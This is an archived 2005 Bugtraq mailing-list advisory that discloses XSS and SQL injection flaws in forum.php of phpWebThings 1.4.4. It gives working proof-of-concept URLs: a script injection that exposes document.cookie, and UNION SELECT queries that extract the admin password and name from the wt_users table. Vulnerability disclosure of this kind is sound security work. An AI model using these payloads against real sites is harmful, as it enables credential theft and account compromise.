[41046] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

XSS & SQL injection in phpWebThing

daemon@ATHENA.MIT.EDU (xx_hack_xx_2004@hotmail.com)
Sat Nov 5 15:20:43 2005

Date: 5 Nov 2005 03:00:11 -0000
Message-ID: <20051105030011.9445.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: xx_hack_xx_2004@hotmail.com
To: bugtraq@securityfocus.com

Vulnerable: phpWebThings 1.4.4
http://phpwebthings.org

The bug reside in : forum.php 

Exploit :

http://xxx.com/forum.php?forum=[XSS]
http://xxx.com/forum.php?forum=[SQL]

Example :

XSS

http://xxx.com/forum.php?forum='><script>alert(document.cookie)</script>

SQL

For Passowrd

http://xxx.com/forum.php?forum=-1 union select password,password,null,null,null,null from wt_users where uid=1/*

For Name

http://xxx.com/forum.php?forum=-1 union select name,name,null,null,null,null from wt_users where uid=1/*



Discovery by Linux_Drox

http://www.lezr.com

Best Regards


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[41046] in bugtraq

XSS & SQL injection in phpWebThing

daemon@ATHENA.MIT.EDU (xx_hack_xx_2004@hotmail.com)Sat Nov 5 15:20:43 2005

daemon@ATHENA.MIT.EDU (xx_hack_xx_2004@hotmail.com)
Sat Nov 5 15:20:43 2005